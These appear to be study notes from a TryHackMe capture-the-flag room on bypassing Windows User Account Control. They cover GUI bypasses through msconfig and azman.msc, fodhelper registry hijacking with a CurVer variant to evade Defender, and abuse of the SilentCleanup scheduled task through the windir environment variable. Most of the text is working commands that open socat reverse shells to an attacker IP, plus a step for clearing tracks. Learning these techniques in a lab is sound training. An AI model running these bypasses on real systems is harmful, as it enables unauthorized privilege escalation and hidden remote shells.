UAC: User Account Control - Windows security feature that forces any new process to run in the security context of a non-privileged account by default -processes started by any user including admin are run as non-privileged -if UAC is disabled, malicious app can gain admin privileges if malicious app is run by the admin user -provides a way to elevate privileges (dialog box) -Integrity Levels: Low, Medium, High, System -Filtered Tokens: treats regular users and admins in a slightly different way during logon -non-admins: single access token to perform all tasks -admins: two tokens a. filtered token(used for reg operations) b. elevated token(full admin privileges)
UAC: GUI based bypasses xfreerdp /v:MachineIP /u:attacker /p:Password321
msconfig -auto elevation allows specific binaries to elevate without requiring the user’s interaction -run> msconfig -go to tools > command prompt > launch -go to C:\flags\GetFlag-msconfig.exe THM{UAC_HELLO_WORLD}
run: azman.msc -go to help -help topics > right click > view source -search for cmd -right click > open -go to C:\flags\GetFlag-azman.exe THM{GUI_UAC_BYPASSED_AGAIN}
UAC:Auto-elevating processes -exe must be signed by the windows publisher -exe must be contained in a trusted directory - %SystemRoot%/System32/ or %ProgramFiles%/ -exe must declare the autoElevate element inside their manifests
check file’s manifest using sigcheck sigcheck64.exe -m c:/windows/system32/msconfig.exe
fodhelper.exe - windows default executable manages language features -can autoelevate using default UAC settings -does not prompt for elevation -can be used in medium integrity remote shell and leveraged into a fully functional high integrity process eg Glpteba malware
-windows checks registery to open a file to see which application to use using Programmatic ID(progID) -specified in HKEY_CLASSES_ROOT command specified in shell/open/command -can use user-specific if specified. if not system-wide association HKEY_CURRENT_USER (HKCU), HKEY_LOCAL_MACHINE (HKLM) respectively
steps: attack machine: nc [UACIP] 9999 net user attacker | find “Local Group” whoami /groups | find “Label”
C:> set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command C:> set CMD=“powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<attacker_ip>:4444 EXEC:cmd.exe,pipes”
C:> reg add %REG_KEY% /v “DelegateExecute” /d "" /f C:> reg add %REG_KEY% /d %CMD% /f
nc -lvp 4444 C:> fodhelper.exe
C:> C:\flags\GetFlag-fodhelper.exe THM{AUTOELEVATE4THEWIN}
Windows Defender Enabled -make a UAC bypass attempt will be shown as an alert -using Curver - multiple instances of an application with different versions running on the same system. curver points to the default version of the application to be used
steps: nc -lvp 4445 C:> set CMD=“powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:<attacker_ip>:4445 EXEC:cmd.exe,pipes” C:> reg add “HKCU\Software\Classes.thm\Shell\Open\command” /d %CMD% /f C:> reg add “HKCU\Software\Classes\ms-settings\CurVer” /d “.thm” /f C:> fodhelper.exe
C:> C:\flags\GetFlag-fodhelper-curver.exe THM{AV_UAC_BYPASS_4_ALL}
clearing our tracks: reg delete “HKCU\Software\Classes.thm” /f reg delete “HKCU\Software\Classes\ms-settings” /f
UAC Environment variable expansion -UAC configured to “Always Notify” - autoElevate won’t work beacuse the user has to be prompted -use a scheduled task that can be run by the user but executed with high privilege - independent of UAC security level
-disk cleanup scheduled task run on demand using: %windir%\system32\cleanmgr.exe /autoclean /d %systemdrive%
steps: nc -lvp 4446 nc [Room-IP] 9999
C:> reg add “HKCU\Environment” /v “windir” /d “cmd.exe /c C:\tools\socat\socat.exe TCP:<attacker_ip>:4446 EXEC:cmd.exe,pipes &REM ” /f C:> schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
C:\flags\GetFlag-diskcleanup.exe THM{SCHEDULED_TASKS_AND_ENVIRONMENT_VARS}